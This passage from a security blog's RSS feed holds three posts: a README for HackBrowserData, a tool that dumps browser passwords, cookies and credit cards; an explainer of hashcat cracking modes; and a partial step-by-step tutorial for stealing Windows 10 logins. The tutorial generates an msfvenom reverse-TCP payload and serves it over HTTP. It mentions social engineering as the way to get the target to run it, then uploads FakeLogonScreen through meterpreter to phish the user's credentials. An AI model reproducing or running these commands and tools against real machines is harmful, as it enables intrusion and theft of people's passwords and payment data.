<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Brave</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Opera</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Vivaldi</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Firefox</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Firefox Beta</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Firefox Dev</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Firefox ESR</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
<tr>
<td align="left">Firefox Nightly</td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
<td align="center"><img src="https://s.w.org/images/core/emoji/16.0.1/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /></td>
</tr>
</tbody>
</table>
<h2><a id="user-content-install" class="anchor" href="https://github.com/moonD4rk/HackBrowserData#install" target="_blank" rel="nofollow noopener" aria-hidden="true"></a><strong>Install</strong></h2>
<p dir="auto">Installation of <code>HackBrowserData</code> is dead-simple, just download <a href="https://github.com/moonD4rk/HackBrowserData/releases" target="_blank" rel="nofollow noopener">the release for your system</a> and run the binary.</p>
<blockquote>
<p dir="auto">In some situations, this security tool will be treated as a virus by Windows Defender or other antivirus software and can not be executed. The code is all open source, you can modify and compile by yourself.</p>
</blockquote>
<h3><a id="user-content-building-from-source" class="anchor" href="https://github.com/moonD4rk/HackBrowserData#building-from-source" target="_blank" rel="nofollow noopener" aria-hidden="true"></a><strong>Building from source</strong></h3>
<p dir="auto">support <code>go 1.14+</code></p>
<div class="highlight highlight-source-shell position-relative overflow-auto">
<pre>git clone https://github.com/moonD4rk/HackBrowserData

<span class="pl-c1">cd</span> HackBrowserData

go build</pre>
</div>
<p><strong>Cross compile</strong></p>
<p>Need to install target OS&#8217;s <code>gcc</code> library, here&#8217;s an example of the use <code>Mac</code> building for <code>Windows</code> and <code>Linus</code></p>
<h3><strong>Windows</strong></h3>
<div class="highlight highlight-source-shell">
<pre>brew install mingw-w64

CGO_ENABLED=1 GOOS=windows GOARCH=amd64 CC=<span class="pl-s"><span class="pl-pds">"</span>x86_64-w64-mingw32-gcc<span class="pl-pds">"</span></span> go build</pre>
</div>
<h3><strong>Linux</strong></h3>
<div class="highlight highlight-source-shell">
<pre>brew install FiloSottile/musl-cross/musl-cross

CC=x86_64-linux-musl-gcc CXX=x86_64-linux-musl-g++ GOARCH=amd64 GOOS=linux CGO_ENABLED=1 go build -ldflags <span class="pl-s"><span class="pl-pds">"</span>-linkmode external -extldflags -static<span class="pl-pds">"</span></span></pre>
</div>
<h3><a id="user-content-run" class="anchor" href="https://github.com/moonD4rk/HackBrowserData#run" target="_blank" rel="nofollow noopener" aria-hidden="true"></a><strong>Run</strong></h3>
<p>You can double-click to run, or use the command line.</p>
<pre><code>PS C:\test&gt; .\hack-browser-data.exe -h
NAME:
   hack-browser-data - Export passwords/cookies/history/bookmarks from browser
USAGE:
   [hack-browser-data -b chrome -f json -dir results -cc]
   Get all data(password/cookie/history/bookmark) from chrome
VERSION:
   0.3.7</code></pre>
<pre><code>GLOBAL OPTIONS:
   --verbose, --vv                     verbose (default: false)
   --compress, --cc                    compress result to zip (default: false)
   --browser value, -b value           available browsers: all|opera|firefox|chrome|edge (default: "all")
   --results-dir value, --dir value    export dir (default: "results")
   --format value, -f value            format, csv|json|console (default: "csv")
   --profile-dir-path value, -p value  custom profile dir path, get with chrome://version
   --key-file-path value, -k value     custom key file path
   --help, -h                          show help (default: false)
   --version, -v                       print the version (default: false)

PS C:\test&gt;  .\hack-browser-data.exe -b all -f json --dir results -cc
[x]:  Get 44 cookies, filename is results/microsoft_edge_cookie.json
[x]:  Get 54 history, filename is results/microsoft_edge_history.json
[x]:  Get 1 passwords, filename is results/microsoft_edge_password.json
[x]:  Get 4 bookmarks, filename is results/microsoft_edge_bookmark.json
[x]:  Get 6 bookmarks, filename is results/360speed_bookmark.json
[x]:  Get 19 cookies, filename is results/360speed_cookie.json
[x]:  Get 18 history, filename is results/360speed_history.json
[x]:  Get 1 passwords, filename is results/360speed_password.json
[x]:  Get 12 history, filename is results/qq_history.json
[x]:  Get 1 passwords, filename is results/qq_password.json
[x]:  Get 12 bookmarks, filename is results/qq_bookmark.json
[x]:  Get 14 cookies, filename is results/qq_cookie.json
[x]:  Get 28 bookmarks, filename is results/firefox_bookmark.json
[x]:  Get 10 cookies, filename is results/firefox_cookie.json
[x]:  Get 33 history, filename is results/firefox_history.json
[x]:  Get 1 passwords, filename is results/firefox_password.json
[x]:  Get 1 passwords, filename is results/chrome_password.json
[x]:  Get 4 bookmarks, filename is results/chrome_bookmark.json
[x]:  Get 6 cookies, filename is results/chrome_cookie.json
[x]:  Get 6 history, filename is results/chrome_history.json
[x]:  Compress success, zip filename is results/archive.zip</code><code></code></pre>
<h3 dir="auto">Run with custom browser profile path</h3>
<div class="snippet-clipboard-content position-relative overflow-auto">
<pre><code>PS C:\Users\User\Desktop&gt; .\hack-browser-data.exe -b edge -p 'C:\Users\User\AppData\Local\Microsoft\Edge\User Data\Default' -k 'C:\Users\User\AppData\Local\Microsoft\Edge\User Data\Local State'

[x]:  Get 29 history, filename is results/microsoft_edge_history.csv
[x]:  Get 0 passwords, filename is results/microsoft_edge_password.csv
[x]:  Get 1 credit cards, filename is results/microsoft_edge_credit.csv
[x]:  Get 4 bookmarks, filename is results/microsoft_edge_bookmark.csv
[x]:  Get 54 cookies, filename is results/microsoft_edge_cookie.csv


PS C:\Users\User\Desktop&gt; .\hack-browser-data.exe -b edge -p 'C:\Users\User\AppData\Local\Microsoft\Edge\User Data\Default'

[x]:  Get 1 credit cards, filename is results/microsoft_edge_credit.csv
[x]:  Get 4 bookmarks, filename is results/microsoft_edge_bookmark.csv
[x]:  Get 54 cookies, filename is results/microsoft_edge_cookie.csv
[x]:  Get 29 history, filename is results/microsoft_edge_history.csv
[x]:  Get 0 passwords, filename is results/microsoft_edge_password.csv</code></pre>
</div>
<p>The post <a href="http://kostacipo.stream/hackbrowserdata-decrypt-passwords-cookies-history-bookmarks-from-the-browser/">HackBrowserData &#8211; Decrypt passwords/cookies/history/bookmarks from the browser</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>http://kostacipo.stream/hackbrowserdata-decrypt-passwords-cookies-history-bookmarks-from-the-browser/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Hashcat: How this Password Cracker Works</title>
		<link>http://kostacipo.stream/hashcat-how-this-password-cracker-works/</link>
					<comments>http://kostacipo.stream/hashcat-how-this-password-cracker-works/#respond</comments>
		
		<dc:creator><![CDATA[Majordomo]]></dc:creator>
		<pubDate>Fri, 13 Nov 2020 10:26:20 +0000</pubDate>
				<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[General]]></category>
		<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[passwords]]></category>
		<guid isPermaLink="false">http://www.kostacipo.stream/?p=1885</guid>

					<description><![CDATA[<p>A must-have tool for penetration testers and to check password strength Hashcat is a popular and effective password cracker widely used by both penetration testers and sysadmins as well as criminals and spies. Cracking passwords is different from guessing a web login password, which typically only allows a small number of guesses before locking your [&#8230;]</p>
<p>The post <a href="http://kostacipo.stream/hashcat-how-this-password-cracker-works/">Hashcat: How this Password Cracker Works</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></description>
										<content:encoded><![CDATA[<h3 style="text-align: justify;">A must-have tool for penetration testers and to check password strength</h3>
<p style="text-align: justify;">Hashcat is a popular and effective password cracker widely used by both penetration testers and sysadmins as well as criminals and spies.</p>
<p style="text-align: justify;">Cracking passwords is different from guessing a web login password, which typically only allows a small number of guesses before locking your account. Instead, someone who has gained access to a system with encrypted passwords (&#8220;hashes&#8221;) will often try to crack those hashes to recover those passwords.</p>
<p style="text-align: justify;">Passwords are no longer stored in plaintext (or shouldn&#8217;t be, anyway). Instead, passwords are encrypted using a one-way function called a hash. Calculating a password like &#8220;Password1&#8221; into a hash is lightning quick. What if all you&#8217;ve got is the hash? A brute-force attack to reverse the hash function and recover the password could be computationally infeasible. Like, until the heat death of the universe infeasible.</p>
<p style="text-align: justify;">Luckily, or unluckily depending on your point of view, none of us is likely to live that long, but there are many ways to reverse a hash to recover the original password without resorting to a probably fruitless brute-force attack.</p>
<h2 style="text-align: justify;">ENTER hashcat.</h2>
<p style="text-align: justify;">It turns out humans are so predictable in their password choices that hashcat can often recover a password.</p>
<aside id="" class="nativo-promo nativo-promo-1 smartphone"></aside>
<h2 style="text-align: justify;">Hashcat uses</h2>
<p style="text-align: justify;">Cracking passwords has many legitimate uses, besides the obvious criminal and espionage ones. A sysadmin may wish to pre-emptively check the security of user passwords. If hashcat can crack them, so can an attacker.</p>
<p style="text-align: justify;">Penetration testers on engagement will frequently find themselves cracking stolen password hashes to move laterally inside a network, or to escalate privileges to an admin user. Since penetration testers work to find security holes on purpose, under contract, so that their customer can improve their security, this is also a perfectly legitimate use case.</p>
<aside id="" class="nativo-promo nativo-promo-1 tablet desktop"></aside>
<p style="text-align: justify;">The real takeaway is that both illegal attackers and legit defenders use hashcat. The best way to prevent an attacker from using hashcat against you is to test your own defenses first to make sure any such attack can&#8217;t succeed.</p>
<h2 style="text-align: justify;">How does hashcat work?</h2>
<p style="text-align: justify;">At its most basic level, hashcat guesses a password, hashes it, and then compares the resulting hash to the one it&#8217;s trying to crack. If the hashes match, we know the password. If not, keep guessing. There are numerous attacks short of a full brute-force attempt, including dictionary attacks, combinator attacks, mask attacks, and rule-based attacks. Hashcat can also harness the power of your GPU to brute force if you have the computing rig for it &#8212; and time to spare.</p>
<h2 style="text-align: justify;">Hashcat examples</h2>
<p style="text-align: justify;"><strong>Hashcat dictionary attack<br />
</strong>Since humans tend to use really bad passwords, a dictionary attack is the first and obvious place to start. The&nbsp;<a class="md-opjjpmhoiojifppkkcdabiobhakljdgm_doc" href="https://www.scrapmaker.com/data/wordlists/dictionaries/rockyou.txt" target="_blank" rel="noopener nofollow noreferrer">rockyou.txt word list</a>&nbsp;is a popular option. Containing more than 14 million passwords sorted by frequency of use, it begins with common passwords such as “123456”, “12345”, “123456789”, “password”, “iloveyou”, “princess”, “1234567”, and “rockyou”, all the way to less common passwords such as “xCvBnM”, “ie168”, “abygurl69”, “a6_123”, and “*7¡Vamos!”.</p>
<p style="text-align: justify;">Many other free wordlists exist on the internet, especially targeted at specific languages. Hashcat lets you specify the wordlist of your choice.</p>
<aside id="" class="nativo-promo nativo-promo-2 tablet desktop smartphone"></aside>
<p style="text-align: justify;"><strong>Hashcat combinator attack<br />
</strong>Humans often create passwords that are two words mushed together. Hashcat exploits this using a combinator attack that takes two-word lists (also known as &#8220;dictionaries&#8221;) and creates a new word list of every word combined with every other word.</p>
<p style="text-align: justify;">The&nbsp;<a class="md-opjjpmhoiojifppkkcdabiobhakljdgm_doc" href="https://hashcat.net/wiki/doku.php?id=combinator_attack" target="_blank" rel="noopener nofollow noreferrer">hashcat documentation</a>&nbsp;gives the following example of two dictionaries:</p>
<p style="text-align: justify;"><code>yellow</code><br />
<code>green</code><br />
<code>black</code><br />
<code>blue</code></p>
<p style="text-align: justify;">and:</p>
<p style="text-align: justify;"><code>car</code><br />
<code>bike</code></p>
<p style="text-align: justify;">Hashcat then smushes up every word with every other word, and then test the following passwords:</p>
<p style="text-align: justify;"><code>yellowcar</code><br />
<code>greencar</code><br />
<code>blackcar</code><br />
<code>bluecar</code><br />
<code>yellowbike</code><br />
<code>greenbike</code><br />
<code>blackbike</code><br />
<code>bluebike</code></p>
<p style="text-align: justify;">Punctuation such as hyphens (-), exclamation points (!) and other special characters can also be added to create a final word list that has passwords like &#8220;yellow-car!&#8221; and &#8220;blue-bike!&#8221; and so forth.</p>
<p style="text-align: justify;"><strong>Hashcat mask attack<br />
</strong>Lots of users tend to use passwords in a certain format. One uppercase letter followed by six letters plus a digit on the end is common for older passwords &#8212; &#8220;Bananas1&#8221;, for example. Instead of trying to brute-force every possible password, you can use hashcat to search for all passwords in that format, which drastically reduces the number of possible guesses necessary &#8212; if, indeed, the password in question is in that format.</p>
<p style="text-align: justify;">The hashcat documentation explains why a mask attack is often orders of magnitude faster than a brute-force attack:</p>
<blockquote><p>In traditional brute-force attack we require a charset that contains all uppercase letters, all lowercase letters and all digits (a.k.a. “mixalpha-numeric”). The password length is 9, so we have to iterate through 62^9 (13.537.086.546.263.552) combinations. Let’s say we crack with a rate of 100M/s, this requires more than four years to complete.</p></blockquote>
<blockquote><p>In mask attack we know about humans and how they design passwords. The above password matches a simple but common pattern. A name and year appended to it. We can also configure the attack to try the uppercase letters only on the first position. It is very uncommon to see an uppercase letter only in the second or the third position. To make it short, with mask attack we can reduce the keyspace to 52*26*26*26*26*10*10*10*10 (237.627.520.000) combinations. With the same cracking rate of 100M/s, this requires just 40 minutes to complete.</p></blockquote>
<p style="text-align: justify;"><strong>Hashcat rule-based attack<br />
</strong>If other, easier, options fail, and you&#8217;ve got a specific sense of how your target constructs a password, hashcat offers a programming language-like syntax for a rule-based attack, in which you can specify what kind of passwords to try.</p>
<p style="text-align: justify;">&#8220;The rule-based attack is one of the most complicated of all the attack modes,&#8221; the&nbsp;<a class="md-opjjpmhoiojifppkkcdabiobhakljdgm_doc" href="https://hashcat.net/wiki/doku.php?id=rule_based_attack" target="_blank" rel="noopener nofollow noreferrer">hashcat website says</a>. &#8220;The rule-based attack is like a programming language designed for password candidate generation. It has functions to modify, cut or extend words and has conditional operators to skip some, etc. That makes it the most flexible, accurate and efficient attack.&#8221;</p>
<p style="text-align: justify;">The learning curve to get started with hashcat is very low but learning the hashcat rule syntax will spike that learning curve sharply.</p>
<p style="text-align: justify;"><strong>Hashcat brute-force attack<br />
</strong>If all else fails, throw a hail Mary and hope hashcat&#8217;s brute-force attack succeeds before our sun goes nova and engulfs the Earth. You never know, you might get lucky.</p>
<p>The post <a href="http://kostacipo.stream/hashcat-how-this-password-cracker-works/">Hashcat: How this Password Cracker Works</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>http://kostacipo.stream/hashcat-how-this-password-cracker-works/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>How to Hack Windows 10 Passwords Using FakeLogonScreen in Kali Linux</title>
		<link>http://kostacipo.stream/how-to-hack-windows-10-passwords-using-fakelogonscreen-in-kali-linux/</link>
					<comments>http://kostacipo.stream/how-to-hack-windows-10-passwords-using-fakelogonscreen-in-kali-linux/#respond</comments>
		
		<dc:creator><![CDATA[Majordomo]]></dc:creator>
		<pubDate>Tue, 27 Oct 2020 19:57:56 +0000</pubDate>
				<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[Windows]]></category>
		<category><![CDATA[kali linux]]></category>
		<category><![CDATA[passwords]]></category>
		<category><![CDATA[windows]]></category>
		<guid isPermaLink="false">http://www.kostacipo.stream/?p=1835</guid>

					<description><![CDATA[<p>This article demonstrates an in-depth guide on how to hack Windows 10 Passwords using FakeLogonScreen. Hacking Windows 10 password is an exciting topic, so I decided to make this windows hacking tutorial. I will use FakeLogonScreen and Kali Linux to hack Windows 10 passwords. FakelogonScreen is a handy and stealthy tool that creates a fake [&#8230;]</p>
<p>The post <a href="http://kostacipo.stream/how-to-hack-windows-10-passwords-using-fakelogonscreen-in-kali-linux/">How to Hack Windows 10 Passwords Using FakeLogonScreen in Kali Linux</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This article demonstrates an in-depth guide on how to hack Windows 10 Passwords using FakeLogonScreen. Hacking Windows 10 password is an exciting topic, so I decided to make this windows hacking tutorial.</p>
<p>I will use FakeLogonScreen and Kali Linux to hack Windows 10 passwords. FakelogonScreen is a handy and stealthy tool that creates a fake Log on-screen on a target machine running Windows 10. This tool enforces the target user to enter the correct credentials and, after getting it, passes it to the backdoor attacker.</p>
<p><a href="https://twitter.com/bitsadmin">Arris Huijgen</a> developed this useful tool, it takes advantage of the normal behavior of the Windows environment, displaying the login screen when it comes out of sleep mode, and asking to enter credentials. At that time, this tool looked for phishing Windows credentials from the target, and the strength of this tool came in when it only accepts the valid credentials.</p>
<h2>Steps to Hack Windows 10 Password</h2>
<p>Now let’s try this tool and perform the exploit. We need to deploy two virtual machines i.e. Kali Linux and Windows 10. In my virtual lab environment, the Kali (attacking machine) has an IP: 192.168.0.103, and the Windows (target machine) got 192.168.0.100.</p>
<h3>Download the FakeLogonScreen in Kali Linux</h3>
<p>First, we need to download the FakeLogonScreen executable in our attacking machine from the link:</p>
<p><a href="https://github.com/bitsadmin/fakelogonscreen/releases"><em>https://github.com/bitsadmin/fakelogonscreen/releases</em></a></p>
<p>Now assume the target machine is connected to the same network as the attacking machine.</p>
<h2>Creating the Malicious Payload to Hack Windows</h2>
<p>We will create a malicious payload by using msfvenom tool according to the information acquired by the target system. We will set lhost to our Kali’s IP i.e. 192.168.0.103, and set lport as 4444. Since we are interested in exploiting a Windows system, we will generate a payload as an executable file to easily gets it executed on the target machine. Use command:</p>
<p><strong># msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.103 lport=4444 -f exe &gt;&gt; payload.exe</strong></p>
<p><img fetchpriority="high" decoding="async" class="aligncenter wp-image-7606 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/07/Creating-the-Malicious-Payload-to-Hack-Windows.png" sizes="(max-width: 630px) 100vw, 630px" srcset="https://www.ehacking.net/wp-content/uploads/2020/07/Creating-the-Malicious-Payload-to-Hack-Windows.png 630w, https://www.ehacking.net/wp-content/uploads/2020/07/Creating-the-Malicious-Payload-to-Hack-Windows-300x75.png 300w" alt="Creating the Malicious Payload to Hack Windows" width="630" height="158">Here the ‘payload.exe’ is the name of the generated payload. After that, we will run Python One-liner to create an HTTP server that will host this malicious payload at port 80 of the target machine.</p>
<p><strong>#python -m SimpleHTTPServer 80</strong></p>
<p><img decoding="async" class="aligncenter wp-image-7607 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/07/Creating-the-Malicious-Payload-to-Hack-Windows-2.png" sizes="(max-width: 629px) 100vw, 629px" srcset="https://www.ehacking.net/wp-content/uploads/2020/07/Creating-the-Malicious-Payload-to-Hack-Windows-2.png 629w, https://www.ehacking.net/wp-content/uploads/2020/07/Creating-the-Malicious-Payload-to-Hack-Windows-2-300x31.png 300w" alt="Creating the Malicious Payload to Hack Windows 2" width="629" height="64"></p>
<h2>Download the Payload on Target Machine</h2>
<p>All set now, the most crucial stage came when we have to get the target to download this malicious payload. In real-life scenarios, an attacker can use different social engineering techniques and let the target user to download this malicious file into his system.</p>
<p>For practical demonstration, we will access our Kali’s machine directory from the Windows machine and download the payload.</p>
<p><img decoding="async" class="aligncenter wp-image-7608 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/07/Download-the-Payload-on-Target-Machine.png" sizes="(max-width: 893px) 100vw, 893px" srcset="https://www.ehacking.net/wp-content/uploads/2020/07/Download-the-Payload-on-Target-Machine.png 893w, https://www.ehacking.net/wp-content/uploads/2020/07/Download-the-Payload-on-Target-Machine-300x178.png 300w, https://www.ehacking.net/wp-content/uploads/2020/07/Download-the-Payload-on-Target-Machine-768x456.png 768w, https://www.ehacking.net/wp-content/uploads/2020/07/Download-the-Payload-on-Target-Machine-696x413.png 696w, https://www.ehacking.net/wp-content/uploads/2020/07/Download-the-Payload-on-Target-Machine-708x420.png 708w" alt="Download the Payload on Target Machine" width="893" height="530"></p>
<p>This will also be showing the current logs in our Kali machine.</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-7609 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/07/Kali-machine.png" sizes="auto, (max-width: 622px) 100vw, 622px" srcset="https://www.ehacking.net/wp-content/uploads/2020/07/Kali-machine.png 622w, https://www.ehacking.net/wp-content/uploads/2020/07/Kali-machine-300x45.png 300w" alt="Kali machine" width="622" height="93"></p>
<h2>Launch Metasploit to Exploit</h2>
<p>Let’s get straight back to Kali and launch Metasploit-framework.</p>
<p>Use multi/handler module.</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-7610 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/07/Use-multi-handler-module..png" sizes="auto, (max-width: 633px) 100vw, 633px" srcset="https://www.ehacking.net/wp-content/uploads/2020/07/Use-multi-handler-module..png 633w, https://www.ehacking.net/wp-content/uploads/2020/07/Use-multi-handler-module.-300x30.png 300w" alt="Use multi/handler module." width="633" height="64">Set the windows/meterpreter/reverse_tcp payload.</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-7611 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/07/Set-the-windows-meterpreter-reverse_tcp-payload..png" sizes="auto, (max-width: 629px) 100vw, 629px" srcset="https://www.ehacking.net/wp-content/uploads/2020/07/Set-the-windows-meterpreter-reverse_tcp-payload..png 629w, https://www.ehacking.net/wp-content/uploads/2020/07/Set-the-windows-meterpreter-reverse_tcp-payload.-300x30.png 300w" alt="Set the windows meterpreter reverse_tcp payload." width="629" height="63">Set lhost as our IP i.e. 192.168.0.103 and lport as 4444</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-7612 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/07/Set-lhost-as-our-IP-i.e.-192.168.0.103-and-lport-as-4444.png" sizes="auto, (max-width: 632px) 100vw, 632px" srcset="https://www.ehacking.net/wp-content/uploads/2020/07/Set-lhost-as-our-IP-i.e.-192.168.0.103-and-lport-as-4444.png 632w, https://www.ehacking.net/wp-content/uploads/2020/07/Set-lhost-as-our-IP-i.e.-192.168.0.103-and-lport-as-4444-300x46.png 300w" alt="Set lhost as our IP i.e. 192.168.0.103 and lport as 4444" width="632" height="96">After configuring it all, just run the exploit, go back to the Windows machine and run the executable, i.e., ‘payload.exe’. This will quickly get us a meterpreter session.</p>
<p><strong> <img loading="lazy" decoding="async" class="aligncenter wp-image-7613 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/07/exploit.png" sizes="auto, (max-width: 621px) 100vw, 621px" srcset="https://www.ehacking.net/wp-content/uploads/2020/07/exploit.png 621w, https://www.ehacking.net/wp-content/uploads/2020/07/exploit-300x83.png 300w" alt="exploit" width="621" height="172"></strong></p>
<h2>Upload the Executable</h2>
<p>Now upload the FakeLogonScreen executable that we downloaded earlier. Make sure to give it the correct path of the exe file.</p>
<p><strong>&gt;upload /root/Downloads/FakeLogonScreen.exe</strong></p>
<p>After that, get the shell access and run FakeLogonScreen.exe as showing below:</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-7615 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/07/FakeLogon.png" sizes="auto, (max-width: 890px) 100vw, 890px" srcset="https://www.ehacking.net/wp-content/uploads/2020/07/FakeLogon.png 890w, https://www.ehacking.net/wp-content/uploads/2020/07/FakeLogon-300x105.png 300w, https://www.ehacking.net/wp-content/uploads/2020/07/FakeLogon-768x269.png 768w, https://www.ehacking.net/wp-content/uploads/2020/07/FakeLogon-696x244.png 696w" alt="FakeLogon" width="890" height="312">And BOOM!! At the target machine, all the running windows would get closed, and the logon screen would pop up, asking the credentials and appears it as a legitimate window. The user would not hesitate for a second to enter his credentials and get his work back.</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-7616 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/07/target-machine.png" sizes="auto, (max-width: 1015px) 100vw, 1015px" srcset="https://www.ehacking.net/wp-content/uploads/2020/07/target-machine.png 1015w, https://www.ehacking.net/wp-content/uploads/2020/07/target-machine-300x226.png 300w, https://www.ehacking.net/wp-content/uploads/2020/07/target-machine-768x577.png 768w, https://www.ehacking.net/wp-content/uploads/2020/07/target-machine-696x523.png 696w, https://www.ehacking.net/wp-content/uploads/2020/07/target-machine-559x420.png 559w, https://www.ehacking.net/wp-content/uploads/2020/07/target-machine-80x60.png 80w, https://www.ehacking.net/wp-content/uploads/2020/07/target-machine-265x198.png 265w" alt="target machine" width="1015" height="763"></p>
<p>To check the strength of this&nbsp;tool, we will be entering the wrong password.</p>
